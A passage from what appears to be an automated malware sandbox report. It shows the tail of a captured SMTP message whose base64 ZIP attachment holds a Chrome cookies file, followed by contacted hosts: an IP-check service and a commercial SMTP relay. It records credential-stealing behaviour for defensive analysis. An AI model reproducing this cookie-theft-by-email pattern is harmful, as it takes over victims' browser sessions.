/3\r\ny/+B3/5P/P0OTnaT3/S/+jV+7Df9TX+N37T5TZ/+pv/yb/rX/qZ/wm/6/d/0N/1N//vflN3l\r\nHz0/en70/Oj50fOj50fPj54fPT96fvT86PnR86Pn/5fP7/Tr/vhv/Tv+mvH1wd/wt/117/zm\r\nv+mv2VvF+rHf7tf98d/+N/Vf0ozCr/9b/7o//lsGXwBY8jv8utv4NJLd/nV73Xs52V/nd6cv\r\nt3tfdjJ9v/ZvQ62CPjl/hATFr/tr/Ba/7u/6m9J33iLSb/D/AFBLAQIXCxQAAAgIAO5BEU+6\r\n/tz3dBIAAABQAAAjAAAAAAAAAAAAAAAAgQAAAABzdnVzenBwci5hYzEvQ2hyb21lL0RlZmF1\r\nbHQvQ29va2llc1BLBQYAAAAAAQABAFEAAAC1EgAAAAA=\r\n----boundary_0_df9e029a-1917-4f66-9070-834df45f117d--\r\n\r\n\r\n.\r\n",
555 "dst": "199.79.63.218"
556
557
558
559* Network Communication - Hosts:
560
561 "country_name": "United States",
562 "ip": "3.224.145.145",
563 "inaddrarpa": "",
564 "hostname": "checkip.amazonaws.com"
565
566
567 "country_name": "United States",
568 "ip": "199.79.63.218",
569 "inaddrarpa": "",
570 "hostname": "us3.smtp.mailhostbox.com"
571
572
573 "country_name": "United States",
574 "ip": "199.79.63.211",
575 "inaddrarpa": "",
576 "hostname": "us3.smtp.mailhostbox.com"
577
578
579
580* Network Communication - IRC: